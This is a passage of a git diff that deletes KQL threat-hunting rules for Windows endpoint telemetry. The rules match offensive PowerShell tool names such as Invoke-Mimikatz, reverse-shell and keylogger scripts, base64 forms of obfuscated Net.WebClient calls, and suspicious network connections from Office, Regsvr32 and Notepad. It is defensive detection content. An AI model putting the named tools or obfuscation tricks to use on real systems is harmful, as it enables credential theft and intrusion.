"\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith 
"\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith 
"\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or 
FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1")
\ No newline at end of file
diff --git a/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql b/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql
deleted file mode 100644
index 856b527b..00000000
--- a/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/12
-// Level: medium
-// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql b/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql
deleted file mode 100644
index 49fbaa43..00000000
--- a/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql b/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql
deleted file mode 100644
index ec2bd99f..00000000
--- a/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: medium
-// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/Execution/Microsoft_Workflow_Compiler_Execution.kql b/Execution/Microsoft_Workflow_Compiler_Execution.kql
deleted file mode 100644
index fc3958d8..00000000
--- a/Execution/Microsoft_Workflow_Compiler_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, frack113
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
-// Tags: attack.defense_evasion, attack.execution, attack.t1127, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe"
\ No newline at end of file
diff --git a/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql b/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql
deleted file mode 100644
index 3f152c7d..00000000
--- a/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml")
\ No newline at end of file
diff --git a/Execution/Net_WebClient_Casing_Anomalies.kql b/Execution/Net_WebClient_Casing_Anomalies.kql
deleted file mode 100644
index f0456bb4..00000000
--- a/Execution/Net_WebClient_Casing_Anomalies.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/05/24 -// Level: high -// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains 
"uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBiA" or 
ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine 
contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or 
(ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql b/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql
deleted file mode 100644
index 43a0fa9b..00000000
--- a/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/04/14
-// Level: high
-// Description: Detects network connections from the Equation Editor process "eqnedt32.exe".
-// Tags: attack.execution, attack.t1203
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\eqnedt32.exe"
\ No newline at end of file
diff --git a/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql b/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql
deleted file mode 100644
index fece3237..00000000
--- a/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dmitriy Lifanov, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects a network connection initiated by "Regsvr32.exe"
-// Tags: attack.execution, attack.t1559.001, attack.defense_evasion, attack.t1218.010
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql b/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql
deleted file mode 100644
index 8e765072..00000000
--- a/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: EagleEye Team
-// Date: 2020/05/14
-// Level: high
-// Description: Detects a network connection that is initiated by the "notepad.exe" process.
-This might be a sign of process injection from a beacon process or something similar.
-Notepad rarely initiates a network communication except when printing documents for example.
-
-// Tags: attack.command_and_control, attack.execution, attack.defense_evasion, attack.t1055
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100))
\ No newline at end of file
diff --git a/Execution/New_Application_in_AppCompat.kql b/Execution/New_Application_in_AppCompat.kql
deleted file mode 100644
index 65adc423..00000000
--- a/Execution/New_Application_in_AppCompat.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: informational
-// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
-// Tags: attack.execution, attack.t1204.002
-DeviceRegistryEvents
-| where RegistryKey contains "\\AppCompatFlags\\Compatibility Assistant\\Store"
\ No newline at end of file
diff --git a/Execution/New_Process_Created_Via_Wmic.EXE.kql b/Execution/New_Process_Created_Via_Wmic.EXE.kql
deleted file mode 100644
index 77159755..00000000
--- a/Execution/New_Process_Created_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects new process creation using WMIC via the "process call create" flag
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql b/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql
deleted file mode 100644
index d02933f8..00000000
--- a/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/15
-// Level: medium
-// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe")
\ No newline at end of file
diff --git a/Execution/Non_Interactive_PowerShell_Process_Spawned.kql b/Execution/Non_Interactive_PowerShell_Process_Spawned.kql
deleted file mode 100644
index f604fb6e..00000000
--- a/Execution/Non_Interactive_PowerShell_Process_Spawned.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
-// Date: 2019/09/12
-// Level: low
-// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"))))
\ No newline at end of file
diff --git a/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql b/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql
deleted file mode 100644
index 421decbc..00000000
--- a/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton
-// Date: 2021/11/10
-// Level: medium
-// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.
-This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
-This rule will require an initial baseline and tuning that is specific to your organization.
-
-// Tags: attack.execution, attack.t1203
-DeviceNetworkEvents
-| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, 